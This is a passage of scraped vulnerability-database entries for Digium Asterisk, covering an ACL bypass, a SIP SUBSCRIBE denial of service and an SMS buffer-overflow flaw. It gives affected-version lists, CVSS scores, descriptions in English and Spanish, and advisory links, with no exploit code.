digium	asterisk	1.6.1.13
digium	asterisk	1.6.1.13
digium	asterisk	1.6.1.14
digium	asterisk	1.6.1.15
digium	asterisk	1.6.1.16
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.1
digium	asterisk	1.6.2.1
digium	asterisk	1.6.2.2
digium	asterisk	1.6.2.3
digium	asterisk	1.6.2.4

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B8374B5D-DE7A-4C3C-A5FE-579B17006A54",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "4225252F-5960-4A42-A575-00C125860E89",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "A65D76A8-BBDD-4BDE-B789-D745C400DCBE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "A8B0F5A5-4252-4A9C-B830-2419E87AE5A0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "9E8EF2D7-371B-4268-989E-25225CC1F7B6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "ABAC4CE9-1CFA-4279-B0CE-18F3C6FB9AB3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "E16E37A0-F739-4EEE-A1BB-EBC558C62767",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "DF0E2562-D0FC-404C-B725-617AEEF20AB8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.9:*:*:*:*:*:*:*",
              "matchCriteriaId": "C831EC2A-C99D-4FB1-8E5C-2FF685792F2B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "F37C4158-6C4E-448D-929B-288480748289",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.12:*:*:*:*:*:*:*",
              "matchCriteriaId": "5FBC113E-6304-4605-B024-D6D7A264DC9D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.13:*:*:*:*:*:*:*",
              "matchCriteriaId": "CC3FCBAE-2A39-482A-ADF9-870DF63F89D8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.14:*:*:*:*:*:*:*",
              "matchCriteriaId": "57325096-F4D8-4146-A6FD-93219F2C72D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.15:*:*:*:*:*:*:*",
              "matchCriteriaId": "648639A2-26C4-4EDA-A982-25D400836696",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.16:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "37DE011D-1C1B-46AC-9265-F82693CE3C9A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.16:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "790BF14A-0193-4A5C-802B-D82200B22342",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.17:*:*:*:*:*:*:*",
              "matchCriteriaId": "D552F2D3-EB70-413E-8C4F-DD3283434C7C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.18:*:*:*:*:*:*:*",
              "matchCriteriaId": "15C4C10F-BD36-491A-87E7-2F072796DA33",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.18:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "929EAA61-BA69-4F36-A5E9-B8F066405384",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.18:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E60A7436-AFDB-4540-BD4B-01F25BDFBA3F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.18:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "5A1CCA12-CCF2-46F5-BBDD-AAC0C1E8C5FB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.19:*:*:*:*:*:*:*",
              "matchCriteriaId": "AB1D4D06-9D83-495F-98BC-0B6E1C3566B9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.20:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "8D8A87FD-EB9C-4D65-824A-159C206F28FE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.21:*:*:*:*:*:*:*",
              "matchCriteriaId": "55585411-9272-4ED6-962C-B27EBAE11C76",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.21:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DF7BDB9D-403D-4BC4-83FA-AD39EF131714",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.22:*:*:*:*:*:*:*",
              "matchCriteriaId": "7F74046A-9B96-4EE7-AC14-F2A1FBDF65E0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.23:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "512545F1-F007-43D7-AAE9-8120BC5821D7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.24:*:*:*:*:*:*:*",
              "matchCriteriaId": "339BEF35-835E-4B06-B9B4-C2DF26A7B3B2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "DBFF2686-0F5C-4F20-AA93-6B63C5ADCD82",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "759221D5-FC37-446D-9628-233B8D0B9120",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "F82D4812-0429-42D4-BD27-C76CB9E7C368",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "5D1FBCC8-4637-4A67-BFFD-C052C3C03C12",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "F7307E10-9FA5-4940-B837-7936384F61DD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "DBBD0747-F3FF-46D8-A3C4-8268E37BC5AE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.7:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3F759F27-008E-47FB-AC0A-EF11DA19918E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.7:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "D15C82BA-BD1F-4A19-A907-E6C30042F537",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E802481-C8BD-4218-8CDC-5DB112DA946C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.9:*:*:*:*:*:*:*",
              "matchCriteriaId": "D6FC8A53-E3C0-4660-BE75-2B5B8B4F8160",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "93C020CD-D0EA-4B3E-B33C-F900B08B28FE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.10:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0004AADE-1652-4242-A97D-E9818FE03CCF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.10:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "543E9C91-60FE-43AE-9B94-08DD730BA814",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.10:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "252849FA-F46E-4F5A-A488-AA53574CA884",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.11:*:*:*:*:*:*:*",
              "matchCriteriaId": "9EB89B4F-9546-4DF0-B69F-1B9F289BB1E6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.12:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E254415-1D59-4A77-80FB-AE3EF10FBB32",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.12:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DF2407D0-C324-45C4-9FBB-4294F747DBDC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.13:*:*:*:*:*:*:*",
              "matchCriteriaId": "F23A36CC-9AA2-4559-946D-6D0621664342",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.13:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "89C40652-E180-416A-B88A-E6313530E98A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.14:*:*:*:*:*:*:*",
              "matchCriteriaId": "A28C2C5D-A573-4036-A600-BE28A3E417B9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.15:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "EE162390-359F-4C5D-902B-275FB1FC3EF2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.16:*:*:*:*:*:*:*",
              "matchCriteriaId": "4A0A3750-0D34-4FB5-B897-17CA0D0B7CE7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "1F8B700A-FACB-4BC8-9DF2-972DC63D852B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "FFD31B9B-2F43-4637-BE56-47A807384BF3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "E6450D6B-C907-49E6-9788-E4029C09285F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "DDB0432E-024A-4C0C-87FF-448E513D2834",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "D6A6A343-FEA2-49E5-9858-455AE3B29470",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc6:*:*:*:*:*:*",
              "matchCriteriaId": "D57B94E3-EA37-466C-ADC4-5180D4502FDD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc7:*:*:*:*:*:*",
              "matchCriteriaId": "64D35A89-6B21-4770-AA0F-424C5C91A254",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc8:*:*:*:*:*:*",
              "matchCriteriaId": "14817302-A34A-4980-B148-AEB4B3B49BE3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "61FDFA96-E62A-413B-9846-F51F1F7349EC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DA924386-49F6-4371-B975-B1473EEA12F0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "B74A1B99-8901-4690-B994-1DAD3EFA5ABB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.3:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "4253C7DD-3588-4B35-B96D-C027133BE93F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "24AE11DB-16D3-42BF-BC64-E8982107D35B",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "main/acl.c in Asterisk Open Source 1.6.0.x before 1.6.0.25, 1.6.1.x before 1.6.1.17, and 1.6.2.x before 1.6.2.5 does not properly enforce remote host access controls when CIDR notation \"/0\" is used in permit= and deny= configuration rules, which causes an improper arithmetic shift and might allow remote attackers to bypass ACL rules and access services from unauthorized hosts."
    },
    {
      "lang": "es",
      "value": "main/acl.c en Asterisk Open Source 1.6.0.x en versiones anteriores a la 1.6.0.25, 1.6.1.x en versiones anteriores a la 1.6.1.17 y 1.6.2.x en versiones anteriores a la 1.6.2.5 no aplica de manera apropiada los controles de acceso de host remoto cuando la notaci\u00f3n CIDR \"/ 0\" es usada en reglas de configuraci\u00f3n \"permit=\" y \"deny=\", lo que provoca un desplazamiento aritm\u00e9tico incorrecto y podr\u00eda permitir a atacantes remotos eludir las reglas ACL y tener acceso a servicios desde hosts no autorizados."
    }
  ],
  "id": "CVE-2010-1224",
  "lastModified": "2024-11-21T01:13:55.073",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 4.3,
          "confidentialityImpact": "NONE",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2010-04-01T21:30:00.420",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://downloads.asterisk.org/pub/security/AST-2010-003-1.6.0.diff"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://downloads.asterisk.org/pub/security/AST-2010-003-1.6.1.diff"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2010-003-1.6.2.diff"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://downloads.asterisk.org/pub/security/AST-2010-003.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-March/037679.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://osvdb.org/62588"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/38752"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/39096"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/509757/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/38424"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.vupen.com/english/advisories/2010/0475"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56552"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://downloads.asterisk.org/pub/security/AST-2010-003-1.6.0.diff"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://downloads.asterisk.org/pub/security/AST-2010-003-1.6.1.diff"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2010-003-1.6.2.diff"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://downloads.asterisk.org/pub/security/AST-2010-003.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-March/037679.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://osvdb.org/62588"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/38752"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/39096"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/509757/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/38424"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.vupen.com/english/advisories/2010/0475"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56552"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-264"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2014-11-26 15:59

Modified

2024-11-21 02:14

Severity ?

Summary

The res_pjsip_pubsub module in Asterisk Open Source 12.x before 12.5.1 allows remote authenticated users to cause a denial of service (crash) via crafted headers in a SIP SUBSCRIBE request for an event package.

References

▼	URL	Tags
	cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2014-009.html	Patch, Vendor Advisory
	af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2014-009.html	Patch, Vendor Advisory

Impacted products

Vendor	Product	Version
digium	asterisk	12.0.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0
digium	asterisk	12.2.0
digium	asterisk	12.2.0
digium	asterisk	12.2.0
digium	asterisk	12.2.0
digium	asterisk	12.3.0
digium	asterisk	12.3.0
digium	asterisk	12.3.0
digium	asterisk	12.4.0
digium	asterisk	12.4.0
digium	asterisk	12.5.0
digium	asterisk	12.5.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B446105E-6C8E-495A-BF83-A33CB33485A5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "0B53364B-5278-46E9-961A-192CA334CB09",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3B4D6D24-A718-4962-AD4E-F19AFB03BFF4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "BE2F0D0D-761C-4338-93F0-506E94E57000",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "3D38DFCA-E357-4A28-8F03-FDADF40A5185",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F42C9442-9EBC-4CA5-AB1C-BA0662C27BDC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "71762B58-A08B-405B-9596-6D15CF4A95D0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "EA48C05A-E898-42EE-A699-94BBD66E5E0A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "EDCB78F8-AAC8-44B1-BDF4-C73BC8951EC3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.3.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5D92FFF6-E7B2-4210-A652-79AC6B74002C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.3.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DB5E92FB-9CF8-461E-A665-3407D265DF17",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.3.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "536F6C10-3165-40F7-931A-23765AB87555",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "133288EC-8A78-4C9D-BF94-9900CD3D2260",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.4.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "B2E54998-B257-478E-9E52-2BB4F4CD6429",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5FD4498A-72BD-40EB-A332-DE10C87C1015",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.5.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "71961599-009C-42F4-AA26-9B16C39F3CBC",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "The res_pjsip_pubsub module in Asterisk Open Source 12.x before 12.5.1 allows remote authenticated users to cause a denial of service (crash) via crafted headers in a SIP SUBSCRIBE request for an event package."
    },
    {
      "lang": "es",
      "value": "El m\u00f3dulo res_pjsip_pubsub en Asterisk Open Source 12.x anterior a 12.5.1 permite a usuarios remotos autenticados causar una denegaci\u00f3n de servicio (ca\u00edda) a trav\u00e9s de cabeceras manipuladas en una solicitud SIP SUBSCRIBE para un paquete de eventos."
    }
  ],
  "id": "CVE-2014-6609",
  "lastModified": "2024-11-21T02:14:45.450",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 4.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2014-11-26T15:59:01.447",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-009.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-009.html"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-20"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2013-12-19 22:55

Modified

2024-11-21 02:00

Severity ?

Summary

Buffer overflow in the unpacksms16 function in apps/app_sms.c in Asterisk Open Source 1.8.x before 1.8.24.1, 10.x before 10.12.4, and 11.x before 11.6.1; Asterisk with Digiumphones 10.x-digiumphones before 10.12.4-digiumphones; and Certified Asterisk 1.8.x before 1.8.15-cert4 and 11.x before 11.2-cert3 allows remote attackers to cause a denial of service (daemon crash) via a 16-bit SMS message with an odd number of bytes, which triggers an infinite loop.

References

URL	Tags
cve@mitre.org	http://archives.neohapsis.com/archives/bugtraq/2013-12/0089.html
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2013-006.html	Patch, Vendor Advisory
cve@mitre.org	http://osvdb.org/101100
cve@mitre.org	http://secunia.com/advisories/56294
cve@mitre.org	http://www.debian.org/security/2014/dsa-2835
cve@mitre.org	http://www.mandriva.com/security/advisories?name=MDVSA-2013:300
cve@mitre.org	http://www.securityfocus.com/bid/64364
cve@mitre.org	http://www.securitytracker.com/id/1029499
cve@mitre.org	https://exchange.xforce.ibmcloud.com/vulnerabilities/89825
cve@mitre.org	https://issues.asterisk.org/jira/browse/ASTERISK-22590	Exploit, Patch
af854a3a-2127-422b-91ae-364da2661108	http://archives.neohapsis.com/archives/bugtraq/2013-12/0089.html
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2013-006.html	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://osvdb.org/101100
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/56294
af854a3a-2127-422b-91ae-364da2661108	http://www.debian.org/security/2014/dsa-2835
af854a3a-2127-422b-91ae-364da2661108	http://www.mandriva.com/security/advisories?name=MDVSA-2013:300
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/64364
af854a3a-2127-422b-91ae-364da2661108	http://www.securitytracker.com/id/1029499
af854a3a-2127-422b-91ae-364da2661108	https://exchange.xforce.ibmcloud.com/vulnerabilities/89825
af854a3a-2127-422b-91ae-364da2661108	https://issues.asterisk.org/jira/browse/ASTERISK-22590	Exploit, Patch

Impacted products

Vendor	Product	Version
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.18.0
digium	asterisk	1.8.18.0
digium	asterisk	1.8.18.1
digium	asterisk	1.8.19.0
digium	asterisk	1.8.19.0
digium	asterisk	1.8.19.0
digium	asterisk	1.8.19.1
digium	asterisk	1.8.20.0
digium	asterisk	1.8.20.0
digium	asterisk	1.8.20.0
digium	asterisk	1.8.21.0
digium	asterisk	1.8.21.0
digium	asterisk	1.8.22.0
digium	asterisk	1.8.22.0
digium	asterisk	1.8.22.0
digium	asterisk	1.8.23.0
digium	asterisk	1.8.23.0
digium	asterisk	1.8.23.0
digium	asterisk	10.10.0
digium	asterisk	10.10.0
digium	asterisk	10.10.0
digium	asterisk	10.11.0
digium	asterisk	10.11.0
digium	asterisk	10.11.0
digium	asterisk	10.11.0
digium	asterisk	10.12.0
digium	asterisk	10.12.0
digium	asterisk	10.12.0
digium	asterisk	10.12.1
digium	asterisk	10.12.2
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.1
digium	asterisk	11.0.2
digium	asterisk	11.1.0
digium	asterisk	11.1.0
digium	asterisk	11.1.0
digium	asterisk	11.1.1
digium	asterisk	11.1.2
digium	asterisk	11.2.0
digium	asterisk	11.2.0
digium	asterisk	11.3.0
digium	asterisk	11.3.0
digium	asterisk	11.4.0
digium	asterisk	11.4.0
digium	asterisk	11.4.0
digium	asterisk	11.4.0
digium	asterisk	11.5.0
digium	asterisk	11.5.0
digium	asterisk	11.5.0
digium	asterisk	11.5.1
digium	asterisk_digiumphones	10.0.0
digium	asterisk_digiumphones	10.0.0
digium	asterisk_digiumphones	10.0.0
digium	asterisk_digiumphones	10.11.0
digium	asterisk_digiumphones	10.11.0
digium	asterisk_digiumphones	10.11.0
digium	asterisk_digiumphones	10.11.0
digium	asterisk_digiumphones	10.12.0
digium	asterisk_digiumphones	10.12.0
digium	asterisk_digiumphones	10.12.0
